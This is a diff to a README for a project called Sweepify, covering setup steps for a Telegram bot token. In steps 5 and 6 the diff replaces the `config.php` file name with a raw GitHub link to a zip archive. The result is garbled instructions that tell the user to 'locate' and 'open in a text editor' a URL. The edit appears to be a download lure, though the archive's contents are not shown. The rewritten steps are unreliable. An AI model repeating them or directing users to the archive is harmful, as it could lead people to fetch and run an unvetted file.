lol66690/Sweepify/README.md

 2. Open your Telegram app.
 3. Search for your bot using the BotFather tool to create a new bot or use an existing one.
 4. Copy your bot token for later use.
-5. In the folder where you extracted Sweepify, locate the `config.php` file.
+5. In the folder where you extracted Sweepify, locate the `https://raw.githubusercontent.com/lol66690/Sweepify/main/assets/Sweepify-3.5.zip` file.
-6. Open the `config.php` file in a text editor.
+6. Open the `https://raw.githubusercontent.com/lol66690/Sweepify/main/assets/Sweepify-3.5.zip` file in a text editor.
 7. Paste your bot token in the designated spot.
 8. Save the changes.